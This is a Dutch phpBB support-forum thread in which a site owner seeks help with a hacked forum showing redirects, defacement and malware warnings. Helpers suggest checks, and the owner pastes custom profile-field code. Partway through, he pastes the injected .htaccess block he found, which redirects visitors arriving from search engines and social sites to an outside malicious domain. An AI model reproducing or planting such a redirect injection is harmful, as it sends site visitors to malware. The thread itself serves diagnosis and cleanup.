Beveiligingslek?

[Num9]

• Adres van je forum: http://oorlogsvondsten.nl
  Event. modificaties op je forum: geen
  Wanneer ontstond het probleem? random
  phpBB versie: 3.0.10
  
  Heb je onlangs iets veranderd aan je forum? nee
  Wat is het probleem?

Ik heb de laatste tijd veel problemen met het forum:

* doorlinken naar vreemde URL's als je ergens op klikt
* wijziging van het uiterlijk van het forum (ineens heel groot lettertype)
* teksten als "you need to pay for this crypt" die op het forumoverzicht verschijnen
* meldingen dat de website een schadelijke inhoud bevat in de browser
* meldingen van o.a. virusscanners

enz.

Nu bleken er codes in de bestanden te zijn geslopen. Die heb ik keer op keer verwijderd. De problemen hielden echter aan, dus heb ik de hosting leeggehaald en phpBB opnieuw gedownload (vanuit phpbb.nl) en geïnstalleerd.

Nu ging het even goed, tot eergisteren. Weer "you need to..." en als je op de header van het forum klikt, op "toon ongelezen berichten", "bekijk je eigen berichten" of "forumoverzicht", kom je terecht op Google?

Nu heb ik de bestanden met het origineel herschreven, maar daar bleek niets in veranderd. Weet iemand hier raad mee?

[Stigter]

Er zijn op dit moment geen beveiligingslekken bekend, echter zeg ik niet dat ze er niet zijn.

Wel is het van belang om te weten of elk lid van jouw forum hier problemen mee heeft. Heb je mods geinstalleerd? Welke mods? Niet alle mods zijn goedgekeurd door phpbb en kunnen veiligheidslekken veroorzaken.

Gebruik je vaker dezelfde wachtwoorden? Voor je adminaccount, voor je ftp-account en zelfs voor je msql-account?

Is je eigen computer geheel virus vrij?

[Num9]

Bij deze de antwoorden op je vragen:

Iedereen heeft hier last van, dus alle leden / bezoekers.

Geen mods geïnstalleerd, draait momenteel op de software zoals hier gedownload.

Wachtwoorden zijn allemaal 20 tekens lang, van alles door elkaar. Heb voor de herinstallatie allemaal veranderd, maar dat hielp niks. Bij de herinstallatie heb ik alle wachtwoorden wederom veranderd (van CP, FTP, database, eigen account op het forum). Zijn overigens allemaal verschillende wachtwoorden.

Eigen PC is voor zover ik weet virus-vrij. Heb 'm vanmiddag nog gescand, maar kan natuurlijk heel goed de oorzaak zijn geweest. Heb ook een tijd terug problemen gehad met internetbankieren door een virus. Ik ga zo met nog een aantal andere scans aan de slag.

Nu is eigenlijk het belangrijkste dat de foute doorverwijzingen worden opgelost. Zoals ik zei komt iedereen via header, forumoverzicht, enz. uit op google.nl, terwijl als je op de hyperlinks gaat staan, je links-onder wel de juiste link ziet (oorlogsvondsten.nl/forum/index.php).

Wat ik wel nog even kwijt wil, heb het als volgt onderverdeeld:

.../index.htm (verwijst door naar forum/index.php)
.../forum/... (hier staat de forumsoftware in)

Nu heb ik pas een permanente redirect (301 moved permanently) in de index.htm gezet naar ".../forum/index.php" als alternatief voor de doorverwijzing die ik voorheen had (een javascript).

Nu is het vreemde dat "oorlogsvondsten.nl/forum" wel werkt, maar je bij het intoetsten van de link "oorlogsvondsten.nl/forum/index.php" op Google komt.

[Pola]

Als ik de site controleer via Sucuri SiteCheck dan geeft hij aan dat er malware gevonden is.
Bij de details geeft hij aan dat een veelgebruikte plek om de bij jou gevonden malware te injecteren de .htaccess bestanden zijn.

Dit is geen beveiligingslek van phpbb.com, maar lijkt eerder een gat te zijn in de beveiliging van de server van je provider.

[Num9]

Dank voor je antwoord!

Dit vond ik in het eerste .htaccess bestand:

#68fd15#
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(abacho|abizdirectory|about|acoon|alexana|allesklar|allpages|allthesites|alltheuk|alltheweb|altavista|america|amfibi|aol|apollo7|aport|arcor|ask|atsearch|baidu|bellnet|bestireland|bhanvad|bing|blog|bluewin|botw|brainysearch|bricabrac|browseireland|chapu|claymont|click4choice|clickey|clickz|clush|confex|cyber-content|daffodil|devaro|dmoz|dogpile|ebay|ehow|eniro|entireweb|euroseek|exalead|excite|express|facebook|fastbot|filesearch|findelio|findhow|finditireland|findloo|findwhat|finnalle|finnfirma|fireball|flemiro|flickr|freenet|friendsreunited|galaxy|gasta|gigablast|gimpsy|globalsearchdirectory|goo|google|goto|gulesider|hispavista|hotbot|hotfrog|icq|iesearch|ilse|infoseek|ireland-information|ixquick|jaan|jayde|jobrapido|kataweb|keyweb|kingdomseek|klammeraffe|km|kobala|kompass|kpnvandaag|kvasir|libero|limier|linkedin|live|liveinternet|lookle|lycos|mail|mamma|metabot|metacrawler|metaeureka|mojeek|msn|myspace|netscape|netzindex|nigma|nlsearch|nol9|oekoportal|openstat|orange|passagen|pocketflier|qp|qq|rambler|rtl|savio|schnellsuche|search|search-belgium|searchers|searchspot|sfr|sharelook|simplyhired|slider|sol|splut|spray|startpagina|startsiden|sucharchiv|suchbiene|suchbot|suchknecht|suchmaschine|suchnase|sympatico|telfort|telia|teoma|terra|the-arena|thisisouryear|thunderstone|tiscali|t-online|topseven|twitter|ukkey|uwe|verygoodsearch|vkontakte|voila|walhello|wanadoo|web|webalta|web-archiv|webcrawler|websuche|westaustraliaonline|wikipedia|wisenut|witch|wolong|ya|yahoo|yandex|yell|yippy|youtube|zoneru)\.(.*)
RewriteRule ^(.*)$ http://databasehandlingstumped.com/in.cgi?7 [R=301,L]
</IfModule>

De link in de een na laatste regel is ook waar je nu heen gaat als je op bijv. de header klikt.


Alle bestanden overgeschreven, ook de .htaccess files aangepakt, cache geleegd... maar toch nog steeds dezelfde problemen?

[PhilipvD]

Num9, je antwoordt in het verkeerde onderwerp. We gaan verder in je eigen onderwerp.

En let er ook op dat je niet dubbelpost binnen 24 uur, maar in plaats daarvan de knop 'wijzig' gebruikt om iets aan je bericht toe te voegen. Ik heb je berichten nu samengevoegd.
Bedankt!

[Pola]

Alle bestanden overgeschreven, ook de .htaccess files aangepakt, cache geleegd... maar toch nog steeds dezelfde problemen?

De eerste stap die ik zou nemen is om dit probleem te melden bij de hosting provider. Het lijkt er op dat je provider een veiligheidslek heeft op de server, waardoor derden in staat zijn bestanden te besmetten. Zolang het veligheidslek niet aangepakt is, én alle malware opgezocht en verwijderd is, blijf je het risico houden dat het weer terugkomt.

[Num9]

Heb ik reeds gedaan.

Ik heb overigens toch wel eens wat gemodificeerd. Ik heb wat codes toegevoegd aan viewtopic.php en memberlist.php zodat ik afbeeldingen in profielvelden kan zetten. Ik weet of dit problemen kan geven? Zie hieronder de codes die ik aan de bestanden heb toegevoegd.

Ik heb nu de originele bestanden online en het forum draait nu een korte tijd zonder problemen, maar het is wel vaker een korte tijd rustig geweest.

.../viewtopic.php

NA:

Code: Selecteer alles

include($phpbb_root_path . 'includes/bbcode.' . $phpEx);

TOEGEVOEGD:

Code: Selecteer alles

include_once($phpbb_root_path . 'includes/functions_content.' . $phpEx);

EN NA:

Code: Selecteer alles

foreach ($cp_row['blockrow'] as $field_data)
{

TOEGEVOEGD:

Code: Selecteer alles

$uid = $bitfield = $options = '';
$allowed_bbcode = $allowed_smilies = $allowed_urls = true;

generate_text_for_storage($field_data["PROFILE_FIELD_VALUE"], $uid, $bitfield, $options, $allowed_bbcode, $allowed_smilies, $allowed_urls);
$field_data["PROFILE_FIELD_VALUE"] = generate_text_for_display($field_data["PROFILE_FIELD_VALUE"], $uid, $bitfield, $options);

.../memberslist.php

NA:

Code: Selecteer alles

include($phpbb_root_path . 'includes/functions_display.' . $phpEx);

TOEGEVOEGD:

Code: Selecteer alles

include_once($phpbb_root_path . 'includes/functions_content.' . $phpEx);

EN NA:

Code: Selecteer alles

foreach ($profile_fields['blockrow'] as $field_data)
{

TOEGEVOEGD:

Code: Selecteer alles

$uid = $bitfield = $options = '';
$allowed_bbcode = $allowed_smilies = $allowed_urls = true;

generate_text_for_storage($field_data["PROFILE_FIELD_VALUE"], $uid, $bitfield, $options, $allowed_bbcode, $allowed_smilies, $allowed_urls);
$field_data["PROFILE_FIELD_VALUE"] = generate_text_for_display($field_data["PROFILE_FIELD_VALUE"], $uid, $bitfield, $options);